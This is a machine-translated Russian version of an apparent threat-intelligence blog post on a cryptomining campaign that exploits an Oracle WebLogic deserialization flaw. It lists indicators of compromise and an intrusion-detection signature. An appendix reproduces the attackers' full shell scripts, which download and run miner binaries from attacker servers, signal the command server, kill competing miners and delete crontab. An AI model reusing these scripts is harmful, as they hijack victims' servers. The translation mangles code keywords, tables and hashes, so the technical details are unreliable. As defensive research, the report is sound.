в первую очередь полагаются на гибкое использование хорошо известных (и подписанных) уязвимостей в приложениях, работающих в системах, подключенных к Интернету, и полностью игнорируют скрытность или маскировку. В ходе недавно наблюдаемой кампании злоумышленники, исходящие из нескольких адресов источников (191.101.180 [.] 84, 72.11.140 [.] 178) использовали CVE-2017-10271, уязвимость десериализации Java в Oracle WebLogic Server, для нацеливания на устаревшие серверы (рисунок 1). Уязвимости десериализации Java не являются уникальными для Oracle и поражают несколько более старых версий WebSphere, JBoss, Jenkins, OpenNMS и т. Д. В этом классе уязвимостей серверное программное обеспечение пытается десериализовать ненадежный контент без проверки, позволяя злоумышленнику злоупотреблять приложением для выполнения кода. .

Рисунок 1. Соединения от внешнего ненадежного объекта с подозрительным реферером к уязвимой конечной точке Oracle WebLogic.

Подставка для инструментов

После эксплуатации системы злоумышленник загружает и выполняет сценарий оболочки со своего сервера управления и контроля (C2) с помощью Wget. На протяжении всей кампании мы наблюдали несколько вариантов одного и того же инструмента (таблица 1), каждый из которых постепенно добавлял возможности или механизмы очистки. Это указывает на вероятность того, что инструмент является либо публичным сценарием, который повторно используется и строится, либо эта кампания имеет более широкие масштабы, чем команда Gigamon ATR до этого момента независимо наблюдала.

Идентификатор Размещенный URL-адрес Хэш SHA1
Версия A http: //72.11.140 [.] 178 / setup-watch Версия df62241026a96cda6441 : //191.101.180 [.] 84: 80 / robots.txt 4c3f1cc052f7216447df8954a55e373bdf2ecefc
Таблица 1. Версии скриптов, замеченные командой Gigamon ATR в недавних кампаниях.

В версии B, по наблюдениям команды Gigamon ATR, сценарий выполняет два основных действия: очистку и постановку инструментов. Во время процедуры очистки сценарий выполняет обширные попытки предотвратить мультипликативные эффекты, уничтожая активные процессы ранее запущенного кода, других майнеров монет в системе или системных утилит, которые могут использоваться для обнаружения действия. Во время промежуточной фазы сценарий запускает две похожие процедуры для загрузки двух разных файлов из разных URI, предоставления исполняемых разрешений и попытки выполнения этих файлов.Оба файла загружаются по пути «/ tmp / xfsallocd». Сценарий отправляет последующий сигнал контроллеру через HTTP-запрос от утилиты загрузки на определенный URI, чтобы указать, был ли файл уже запущен или успешно запущен. На рисунке 2 показан полный процесс подготовки сети без сигнала об успешном выполнении. Для полного обзора исходного кода, пожалуйста, обратитесь к Приложению B.

Рисунок 2: Полный процесс постановки без сигнала выполнения.

Прибыль

Исполняемые двоичные файлы, которые загружаются во время подготовки, являются общеизвестными и идентифицированными майнерами Monero Coin (Таблица 2).Анализ двоичных файлов показывает, что они используют стандартную строку подключения stratum «stratum + tcp: //pool.minexmr.com: 80» с идентификатором кошелька «4AQe5sAFWZKECiaeNTt59LG7kVtqRoSRJMjrmQ6GiMFAeUvoL3MFeTE6zwwHkFP2. Анализ кошелька, связанного с этой деятельностью, показывает, что злоумышленникам было выплачено в общей сложности 603,535663865 XMR, что по текущему обменному курсу составляет примерно 260000 долларов США (обратите внимание, что с учетом колебаний цен на криптовалюту это число чисто оценка момента времени).

fda9a2 HOST / files / l / others
Загрузить URI Имя локального файла Хэш SHA
$ HOST / files / l / default / tmp / xfsallocd, / $ tmp / watchfa1 / tmp / xfsallocd, / tmp / watch-smartd 7c57c61664f2b2373f755f22db9c156a1ca80849
Таблица 2: Двоичные файлы, которые наблюдались во время проведения кампании.

Также стоит отметить, что с 4 января 2017 г. AlienVault опубликовал подпись в общедоступном фиде Emerging Threats (рис. 3), чтобы идентифицировать активность со связанным идентификатором кошелька для этого злоумышленника.

  alert tcp $ HOME_NET любой -> $ EXTERNAL_NET любой (сообщение: «ET CURRENT_EVENTS CoinMiner? Вредоносная Authline обнаружена после CVE-2017-10271
Exploit "; поток: установлен, to_server; content:" {| 22 | id | 22 3A | "; depth: 6; content:" | 22 | method | 22 3a 20 22 | mining.authorize | 22
2c | "; в пределах: 100; содержание:" | 22 | params | 22 | "; в пределах: 50; содержание:" | 5b 22 | 4AQe5sAFWZKECiaeNTt59LG7kVtqRoSRJMjrmQ6GiMFAeUvoL3MFeT
E6zwwHkFPrAyNw2JHDxUSWL82RiZThPpk4SEg7Vqe | 22 2c 20 22 | "; расстояние: 0; метаданные: бывшая_категория ТЕКУЩИЕ_СОБЫТИЯ;
ссылка: url, otx.alienvault.com/pulse/5a4e1c4993199b299f90a212; classtype: активность трояна; sid: 2025186; rev: 1;
метаданные: Attack_target Web_Server, Deployment Datacenter, signature_severity Major, created_at 2018_01_04,
Malware_family CoinMiner ?, performance_impact Low, updated_at 2018_01_04;)  

Рисунок 3. Идентификатор подписи возникающих угроз 2025186 .

Анализ

В рамках нашего расследования аналитики команды Gigamon ATR смогли выявить дополнительные связанные действия в нашем клиентском пространстве и в открытом доступе.Основными точками поворота были подписи, разработанные для соответствия сценариям Linux, анализ инфраструктуры, сбор информации с открытым исходным кодом и идентификатор кошелька, привязанный к злоумышленнику, наблюдаемому в вышеупомянутой кампании. Обращаясь к этим индикаторам, команда Gigamon ATR обнаружила следующее:

  • Четырнадцать дополнительных вариантов сценария оболочки Linux с вариациями строки загрузчика, IP-адреса хоста и путей к файлу майнера
  • Три варианта сценариев Windows PowerShell, которые отражают функциональность наблюдаемых сценариев Linux
  • Два дополнительных сервера, выполняющих действия по эксплуатации
  • Тринадцать вариантов майнеров Windows XMRig, настроенных для этой кампании

Все индикаторы, обнаруженные в ходе этого действия, представлены и указаны в Приложении A.

Полученные уроки

Легко взглянуть на это относительно простое действие и сделать вывод о профессиональном мастерстве злоумышленников — слишком просто для предприятия, чтобы быть восприимчивым к этому типу деятельности. Однако преступники могут скомпрометировать большое количество жертв и получить прибыль от своей деятельности. Вышеупомянутое повторяет, что:

  • Видимость и знание вашего интернет-следа жизненно важны
  • Многоуровневые стратегии обнаружения обеспечивают надежные средства для обнаружения вредоносной активности
  • Криминалистическая экспертиза и анализ первопричин имеют решающее значение для долгосрочной непрерывности бизнес-операций во время инцидентов

Видимость и знания вашего следа в Интернете имеет жизненно важное значение

Если успешная эксплуатация устаревших и незащищенных активов приносит злоумышленнику доход, вероятно, он продолжит использовать эти методы.Знание инвентаризации ваших активов, версий приложений и поверхности атаки поможет вам лучше предотвращать, обнаруживать и реагировать. В случае многих устаревших или устаревших систем на основе * nix маловероятно, что будет поддерживаться какое-либо программное обеспечение для обнаружения конечных точек или реагирования, что увеличивает потребность в широко распространенной видимости и подотчетности сети для этих конечных точек.

Многоуровневые стратегии обнаружения предоставляют надежные средства обнаружения вредоносной активности

Простое оповещение о IOC, представленных в этом посте, будет служить начальным уровнем обнаружения, но организациям следует стремиться к более надежным индикаторам злонамеренной активности.В случае этого конкретного инцидента существует множество ключевых точек обнаружения. Примеры:

  • Атомарные индикаторы: сопоставление данных об угрозах на серверах, сопоставление данных об угрозах в загруженных двоичных файлах, активность сети для добычи монет и т. Д.
  • Сложные индикаторы: исполняемые файлы, загруженные с помощью подозрительного пользовательского агента, взаимодействие с открытыми в Интернете системами из «недавно обнаруженных» »Объекты с низкой репутацией, исполняемые файлы загружаются сразу после попытки эксплойта и т. Д.

Криминалистическая экспертиза и анализ первопричин имеют решающее значение для долгосрочной непрерывности бизнес-операций во время инцидентов

Даже в случае успешного обнаружения отказ от сдерживания или исправления активности, скорее всего, приведет к продолжению эксплуатации. В случае интерактивных злоумышленников неполное устранение также даст вам важную информацию о том, что вы знаете об их присутствии. Рассмотрим сценарий, в котором вы обнаруживаете активность, выполняете криминалистическую экспертизу, чтобы убедиться, что не было дополнительной эксплуатации, и переходите к повторному созданию образа системы для обеспечения непрерывности бизнеса.Надлежащее удаление может быть трудоемким и сложным процессом, который лучше всего решить, если привлечь группу реагирования на инциденты, чтобы обеспечить полное устранение неполадок.

Gigamon Insight — это решение для анализа сетевой безопасности, которое предлагает возможность SaaS, которая позволяет клиентам получать и использовать широкую прозрачность сети для операций по обеспечению безопасности. В рамках своего исследования команда Gigamon ATR координирует раскрытие угроз и уязвимостей безопасности с соответствующими сторонами, чтобы максимизировать как реагирование, так и усилия по исправлению положения жертв, а также работать над реальным повышением безопасности клиентов и других жертв до публикации сообщений в блогах. .Чтобы узнать больше о команде Gigamon ATR, посетите www.gigamon.com/research/applied-threat-research-team.html .

Приложение A: Индикаторы взлома Имя файла загруженный файл, обычно в / tmp или в рабочем каталоге5fd2ddca0aff8130115ef8b870e508e79531258fe822e3a948dbc071
Индикатор Тип Описание
72.11.140 [.] 178 IP-адрес Сервер для эксплуатации и размещения инструментов, наблюдаемый ICEBRG
. IP-адрес Сервер для эксплуатации и размещения инструментов, идентифицированный с помощью вторичного анализа
72.11.140 [.] 180 IP-адрес Сервер для эксплуатации и постановки инструментов, идентифицированный посредством вторичного анализа
191.101.180 [.] 84 IP-адрес Сервер для эксплуатации и размещения инструментов, идентифицированный посредством вторичного анализа
/ files / l / default URI URI вредоносного ПО для майнинга монет по умолчанию
/ files / l / others URI URI вредоносного ПО для майнинга монет
carbon Имя файла Имя загруженного файла, обычно в / tmp или рабочем каталоге
infoed Имя файла Имя загруженного файла, обычно в / tmp или рабочем каталоге
ksxworker Имя файла
rcp_bh Имя файла Имя загруженного файла, обычно в / tmp или рабочий каталог
watch_smartd Имя файла Имя загруженного файла, обычно в / tmp или в рабочем каталоге
xfsallocd Имя файла Имя загруженного файла, обычно в / tmp2 или в каталоге / tmp2
xlog-демон Имя файла Имя загруженного файла, как правило, в / TMP или рабочих реж
9c2d266e880848a3f08dcceee0d27a660c521ac5 SHA1 Hash Hash сценария доставляется через эксплоит определены с помощью вторичного анализа
ca9fad2fe12b5231ae42f507afbb00a742b2e3d2 Хэш SHA1 Хэш скрипта, доставленного с помощью эксплойта, идентифицированного с помощью вторичного анализа
abc8be4e557107e80c1c342b7505dd3d2e47ef7f SHA1 Hash Хэш скрипта, доставленного с помощью второстепенного анализа 9044f844f3, 9044f8442 32d1c5e49afe08b SHA1 Хэш Хэш сценария доставляется через эксплойт определены с помощью вторичного анализа
07133903f1c38e653e39f9877dca9575699e807d SHA1 Хэш Хэш сценария доставляется через эксплойт определены с помощью вторичного анализа
68039309925c8804fa745173cc8805938f3e3184 SHA1 Хэш Hash сценария, доставленного с помощью эксплойта, идентифицированного с помощью вторичного анализа
25c804e082a4adc01bfcbc19704f541c7026fa9b Хэш SHA1-хэша Хэш сценария, доставленного с помощью эксплойта, идентифицированного с помощью вторичного анализа
cef441 анализ
c0b76bca13da6989f05c4aeac59029c3987d7f98 Хэш SHA1 Хеш скрипта, доставленного с помощью эксплойта, идентифицированного с помощью вторичного анализа СИС
3 SHA1 Хэш Хэш сценария доставляется через эксплойт определены с помощью вторичного анализа
348d1b3a54dc8
SHA1 Хэш Хэш сценария доставляется через эксплойт определены с помощью вторичного анализа
b4771410fe5bf3825df41735820aeaeff3c685bb SHA1 Хэш Хэш сценария доставляется через эксплойт определены с помощью вторичного анализа
13736cfc4df64a9890c4474f0003a54a8b72ffe2 SHA1 Хэш Хэш сценария доставляется через эксплойт определены с помощью вторичного анализа
5249dadfea25acaeb66a0f1798ac2f09a41f2449 SHA1 Хэш Хэш сценария поставляемого с помощью эксплойта, идентифицированного с помощью вторичного анализа
df62241026a96cda6057d894000de8ed70b3b666 SHA1 Hash Hash of scr IPT поставляется через эксплоит наблюдали ICEBRG
4c3f1cc052f7216447df8954a55e373bdf2ecefc SHA1 Hash Hash сценария доставляется через эксплоит наблюдали ICEBRG
f79a2ba735a988fa6f65988e1f3d39684727bdc4 SHA1 Hash Hash загружаемой инструмента coinminer «по умолчанию» наблюдали ICEBRG
7c57c61664f2b2373f755f22db9c156a1ca80849 SHA1 Хэш Хэш загруженного инструмента coinminer «другой» наблюдали ICEBRG
73f9eff7c66df6e5d3c7ff113e9c8bbc7436d47c SHA1 Хэш Хэш PowerShell варианта А определены с помощью вторичного анализа
3b348578d15080856b869937240899a71bc4f0da SHA1 Hash Хэш варианта B PowerShell, идентифицированный с помощью вторичного анализа
8a8a606f7b2c5efca11c7a7d3d692d5c36a19a7b Хэш SHA1 Хэш PowerShell Вариант С идентифицирован с помощью вторичного анализа
d0cee3f54e6768520d5b96337fcfe6e217567ed7 SHA1 Хэш XMRig процессора Miner (Windows), идентифицировали с помощью вторичного анализа
176d27189aa72330ef2676c8fbee939c6a0ddea2 SHA1 Хэш XMRig CPU Miner (Windows) определены с помощью вторичного анализа
автоматическое обновление.exe Имя файла Имя файла Windows для XMRig. Сохраняется в пути ‘$ env: TMP’
/ files / w / default URI URI размещенного двоичного файла XMRig по умолчанию для Windows
/ files / w / other URI URI размещенных «другой» XMRig двоичном для ОС Windows
2384c36517e300628a040393b05a546ede2808e0 SHA1 Хэш XMRig процессора Miner (Windows), идентифицировали с помощью вторичного анализа
176d27189aa72330ef2676c8fbee939c6a0ddea2 SHA1 Хэш XMRig процессора Miner (Windows) определены с помощью вторичного анализ
43a2535e11d8ba03f6347e324bee93125c7d6cf6 SHA1 Хэш XMRig процессора Miner (Windows), идентифицировали с помощью вторичного анализа
bc30a4d02155a65cc79697b6e1a5d224e59bbfc7 SHA1 Хэш XMRig процессора Miner (Windows), идентифицировали с помощью вторичного анализа
7495514ddc01d262c46b0886a7ce9d9eca334b33 90 442 SHA1 Хэш XMRig процессора Miner (Windows), идентифицировали с помощью вторичного анализа
d0cee3f54e6768520d5b96337fcfe6e217567ed7 SHA1 Хэш XMRig процессора Miner (Windows), идентифицировали с помощью вторичного анализа
7ca8f4b97693d5612106b270bffc86c0ecc21649 SHA1 Хэш XMRig CPU Miner (Windows), идентифицировали с помощью вторичного анализа
9534f9e94a2b6b7752685a7634d3f904b5fbb3ae SHA1 Хэш XMRig процессора Miner (Windows), идентифицировали с помощью вторичного анализа
05ee995cf49feee849a356fcd93c37260fa44fa2 SHA1 Хэш XMRig CPU Miner (Windows) определены с помощью вторичного анализа
df8aa574bf020e289707e4dc78d9ca053bfafe67 SHA1 Hash XMRig CPU Miner (Windows), идентифицированный с помощью вторичного анализа
ab5ef923b47735cac25 SHA1 Хэш XMRig процессора Miner (Windows), идентифицировали с помощью вторичного анализа
de136240b00ed289c29dbde7fcf99313acad458f SHA1 Хэш XMRig процессора Miner (Windows), идентифицировали с помощью вторичного анализа
2e4a31a68fd27f9435c326988e614b46e196a32d SHA1 Хэш XMRig процессора Miner ( Windows), идентифицированный вторичным анализом

Дифференциальный анализ сценариев оболочки Linux

178 72.11.140 178 72.11.140 178 72.11.1405fd2ddca0aff8130115ef8b870e508e795 завиток 191.101.18031258fe822e3a948dbc071 Wget [.] — д -O — [.] 178 72.11.140 178 72.11.140 179 72.11.140/
Хэш SHA1 Загрузчик Хост Локальный файл
9c2d266e880848a3f08dcceee0d27a660c521ac111,140 178 / TMP / rcp_bh
ca9fad2fe12b5231ae42f507afbb00a742b2e3d2 Wget -q -O [.] — / TMP / infoed
abc8be4e557107e80c1c342b7505dd3d2e47ef7f Wget -q [.] — O — 191.101.180 [.] 84 `pwd` / xfsallocd

/ tmp / xfsallocd

e843c894d837a41f5f9f9f2bcf932d1c5e492q1 9044.19044.19044.19044.19044.19044.19044.19044.19044.19044.19044.19044.19044.19044.19044.19044.19044.19044.19044.1844.19044.19044.19044.19044.19044.1902 `/ xfsallocd

/ tmp / xfsallocd

07133903f1c38e653e39f9877dca9575699e807d wget -q -O — 72.11,140 178 / TMP / углерод
68039309925c8804fa745173cc8805938f3e3184 завиток / TMP / infoed
25c804e082a4adc01bfcbc19704f541c7026fa9b Wget -q -O [.] [.] — 72.11 0,140 180 `pwd` / xlog-демон
0b4f904cebd469abff43f0457ab6a77466453173 Wget -q -O [.] — [.] / TMP / rcp_bh
c0b76bca13da6989f05c4aeac59029c3987d7f98 wget -q -O — 191.[.] 101,180 84 `pwd` / xfsallocd

/ TMP / xfsallocd

3 84 / TMP / xfsallocd
348d1b3a54dc8
`pwd` / rcp_bh
b4771410fe5bf3825df41735820aeaeff3c685bb завиток / TMP / infoed
13736cfc4df64a9890c4474f0003a54a8b72ffe2 [.] Кудрявый 72.11,140 178 `pwd` / rcp_bh
5249dadfea25acaeb66a0f1798ac2f09a41f2449 Wget -q -O [.] — [.] / TMP / ksxworker
df62241026a96cda6057d894000de8ed70b3b666 Wget -q -O — ​​ 72.11.140 [.] 178 / tmp / watch-smartd
4c3f1cc052f7216447df8954a55e373bdf2ecefc wget -q -O —
x441 // x4

Приложение B: Исходный код скрипта

Версия A

  HOST = 72.11.140.178
ОБРАТНЫЙ ЗВОНОК = $ HOST
# DOWNLOADER = "curl"
ЗАГРУЗИТЕЛЬ = "wget ​​-q -O -"
DEFAULT_RFILE = $ HOST / files / l / по умолчанию
OTHERS_RFILE = $ HOST / files / l / другие
LFILE_NAME = "умные часы"
# LFILE_PATH = `pwd` / $ LFILE_NAME
LFILE_PATH = / tmp / $ LFILE_NAME
ДЕФОЛТ ()
{
 $ DOWNLOADER $ DEFAULT_RFILE & gt; $ LFILE_PATH
 chmod + x $ LFILE_PATH
 ps -ef | grep $ LFILE_NAME | grep -v grep
 если [$? -ne 0]; тогда
   $ LFILE_PATH -B & amp; & amp; $ DOWNLOADER "$ {CALLBACK} /? Info = l60"
 еще
   $ DOWNLOADER "$ {CALLBACK} /? Info = l69"
 фи
}
ДРУГИЕ ()
{
 $ DOWNLOADER $ OTHERS_RFILE & gt; $ LFILE_PATH
 chmod + x $ LFILE_PATH
 ps -ef | grep $ LFILE_NAME | grep -v grep
 если [$? -ne 0]; тогда
   $ LFILE_PATH -B & amp; & amp; $ DOWNLOADER "$ {CALLBACK} /? Info = l30"
 еще
   $ DOWNLOADER "$ {CALLBACK} /? Info = l39"
 фи
}
ПО УМОЛЧАНИЮ || ДРУГИЕ  

Версия B

  экспорт ПУТЬ = $ ПУТЬ: / bin: / usr / bin: / usr / local / bin: / usr / sbin
HOST = 191.101.180.84
ОБРАТНЫЙ ЗВОНОК = $ HOST
# DOWNLOADER = "curl"
ЗАГРУЗИТЕЛЬ = "wget ​​-q -O -"
LFILE_NAME = "xfsallocd"
# LFILE_PATH = `pwd` / $ LFILE_NAME
LFILE_PATH = / tmp / $ LFILE_NAME
DEFAULT_RFILE = $ HOST / files / l / по умолчанию
OTHERS_RFILE = $ HOST / files / l / другие
ЧИСТЫЙ ()
{
 RMLIST = (/ tmp / * index_bak * /tmp/*httpd.conf* /tmp/*httpd.conf / tmp / a7b104c270 / tmp / Carbon)
 KILIST = (SB1 wipefs AnXqV.yam [email protected] monerohash.com / TMP / a7b104c270 stratum.f2pool.com:8888 42HrCwmHSVyJSAQwn6Lifc3WWAWN56U8s2qAbm6BAagW6Ryh8JgWq8Q1JbZ8nXdcFVgnmAM3q86cm5y9xfmvV1ap6qVvmPe 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQt989KEfGRt6Ww2Xg8 46SDR76rJ2J6MtmP3ZZKi9cEA5RQCrYgag7La3CxEootQeAQULPE2CHJQ4MRZ5wZ1T73Kw6Kx4Lai2dFLAacjerbPzb5Ufg 42HrCwmHSVyJSAQwn6Lifc3WWAWN56U8s2qAbm6BAagW6Ryh8JgWq8Q1JbZ8nXdcFVgnmAM3q86cm5y9xfmvV1ap6qVvmPe xmrpool.eu mine.moneropool.com xmr.crypto-pool.fr:8080 xmr.crypto-pool.fr:3333 xmr.crypto-pool.fr:6666 xmr.crypto-pool.fr:7777 xmr.crypto-pool.fr: 443)
 для элемента в $ {RMLIST [@]}
 делать
     rm -rf $ item
 сделано
 для элемента в $ {KILIST [@]}
 делать
     ps auxf | grep -v grep | grep $ item | awk '{print $ 2}' | xargs kill -9
 сделано
 дней = $ (($ (дата +% s) / 60/60/24))
 ps auxf | grep -v grep | grep "42HrCwmHSVyJSAQwn6Lifc3WWAWN56U8s2qAbm6BAagW6Ryh8JgWq8Q1JbZ8nXdcFVgnmAM3q86cm5y9xfmvV1ap6q | awVkmP '
 ps auxf | grep -v grep | grep $ {days} | awk '{print $ 2}' | xargs kill -9
 пс auxf | grep -v grep | grep "logind.conf "| awk '{print $ 2}' | xargs kill -9
 ps auxf | grep -v grep | grep "cryptonight" | awk '{print $ 2}' | xargs kill -9
 ps auxf | grep -v grep | grep "kworker" | awk '{print $ 2}' | xargs kill -9
 ps auxf | grep -v grep | grep "Silence" | awk '{print $ 2}' | xargs kill -9
 ps auxf | grep -v grep | grep "45hsTaSqTQM4K1Xeqkcy7eLzqdEuQ594fJVmQryCemQSCU878JGQdSDCxbhNyVjSkiaYat8yAfBuRTPSEUPZoARm9gsa 2 awkEHZ {xcEHZ"
 ps auxf | grep -v grep | grep "47sghzufGhJJDQEbScMCwVBimTuq6L5JiRixD8VeGbpjCTA12noXmi4ZyBZLc99e66NtnKff34fHsGRoyZk3ES1s1V4QVcB {print" | awk}
 PS auxf | grep -v grep | grep "44iuYecTjbVZ1QNwjWfJSZFCKMdceTEP5BBNp4qP35c53Uohu1G7tDmShX1TSmgeJr2e9mCw2q1oHHTC2boHfjkM print |
 пс auxf | grep -v grep | grep "xmr.crypto-pool.fr "| awk '{print $ 2}' | xargs kill -9
 ps auxf | grep -v grep | grep "t.sh" | awk '{print $ 2}' | xargs kill -9
 ps auxf | grep -v grep | grep "wipefs" | awk '{print $ 2}' | xargs kill -9
 ps auxf | grep -v grep | grep "carbon" | awk '{print $ 2}' | xargs kill -9
 pkill -f 49hNrEaSKAx5FD8PE49Wa3DqCRp2ELYg8dSuqsiyLdzSehFfyvk4gDfSjTrPtGapqcfPVvMtAirgDJYMvbRJipaeTbzPQu4
 pkill -f 4AniF816tMCNedhQ4J3ccJayyL5ZvgnqQ4X9bK7qv4ZG3QmUfB9tkHk7HyEhh5HW6hCMSw5vtMkj6jSYcuhQTAR1Sbo15gB
 pkill -f 4813za7ePRV5TBce3NrSrugPPJTMFJmEMR9qiWn2Sx49JiZE14AmgRDXtvM1VFhqwG99Kcs9TfgzejAzT9Spm5ga5dkh8df
 pkill -f cpuloadtest
 pkill -f крипто-пул
 pkill -f xmr
 pkill -f prohash
 pkill -f Monero
 pkill -f майнер
 pkill -f нанопул
 pkill -f minergate
 pkill -f ям
 pkill -f Тишина
 pkill -f yam2
 pkill -f minerd
 pkill -f Circle_MI.PNG
 pkill -f завиток
 ps auxf | grep -v grep | grep "mine.moneropool.com" | awk '{print $ 2}' | xargs kill -9
 ps auxf | grep -v grep | grep "крипто-пул" | awk '{print $ 2}' | xargs kill -9
 ps auxf | grep -v grep | grep "prohash" | awk '{print $ 2}' | xargs kill -9
 ps auxf | grep -v grep | grep "monero" | awk '{print $ 2}' | xargs kill -9
 ps auxf | grep -v grep | grep "miner" | awk '{print $ 2}' | xargs kill -9
 ps auxf | grep -v grep | grep "nanopool" | awk '{print $ 2}' | xargs kill -9
 ps auxf | grep -v grep | grep "minergate" | awk '{print $ 2}' | xargs kill -9
 пс auxf | grep -v grep | grep "xmr.crypto-pool.fr:8080"|awk '{print $ 2}' | xargs kill -9
 ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:3333"|awk '{print $ 2}' | xargs kill -9
 ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:443"|awk '{print $ 2}' | xargs kill -9
 ps auxf | grep -v grep | grep "[email protected]" | awk '{print $ 2}' | xargs kill -9
 ps auxf | grep -v grep | grep "stratum" | awk '{print $ 2}' | xargs kill -9
 ps auxf | grep -v grep | grep "44pgg5mYVH6Gnc7gKfWGPR2CxfQLhwdrCPJGzLonwrSt5CKSeEy6izyjEnRn114HTU7AWFTp1SMZ6eqQfvrdeGWzgsUdr2 awkADDu"
 ps auxf | grep -v grep | grep "42HrCwmHSVyJSAQwn6Lifc3WWAWN56U8s2qAbm6BAagW6Ryh8JgWq8Q1JbZ8nXdcFVgnmAM3q86cm5y9xfmvV1ap6q | awVkmP '
 пс auxf | grep -v grep | grep "49JsSwt7MsH5m8DPRHXFSEit9ZTWZCbWwS7QSMUTcVuCgwAU24gni1ydnHdrT9QMibLtZ3spC7PjmEyUSypnmtAG7pykys '|
 ps auxf | grep -v grep | grep "479MD1Emw69idbVNKPtigbej7x1ZwFR1G3boyXUFfAB89uk2AztaMdWVd6NzCTfZVpDReKEAsVVBwYpTG8fsRK3X17jcDKm" | $ 2
 ps auxf | grep -v grep | grep "11231" | awk '{print $ 2}' | xargs kill -9
}
ДЕФОЛТ ()
{
 $ DOWNLOADER $ DEFAULT_RFILE & gt; $ LFILE_PATH
 chmod + x $ LFILE_PATH
 ps -ef | grep $ LFILE_NAME | grep -v grep
 если [$? -ne 0]; тогда
   $ LFILE_PATH -B & amp; & amp; $ DOWNLOADER "$ {CALLBACK} /? Info = l60"
 еще
   $ DOWNLOADER "$ {CALLBACK} /? Info = l69"
 фи
}
ДРУГИЕ ()
{
 $ DOWNLOADER $ OTHERS_RFILE & gt; $ LFILE_PATH
 chmod + x $ LFILE_PATH
 ps -ef | grep $ LFILE_NAME | grep -v grep
 если [$? -ne 0]; тогда
   $ LFILE_PATH -B & amp; & amp; $ DOWNLOADER "$ {CALLBACK} /? Info = l30"
 еще
   $ DOWNLOADER "$ {CALLBACK} /? Info = l39"
 фи
}
ЧИСТЫЙ
ПО УМОЛЧАНИЮ || ДРУГИЕ
crontab -r  
.
Обновлено: 19.08.2021 — 10:07

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *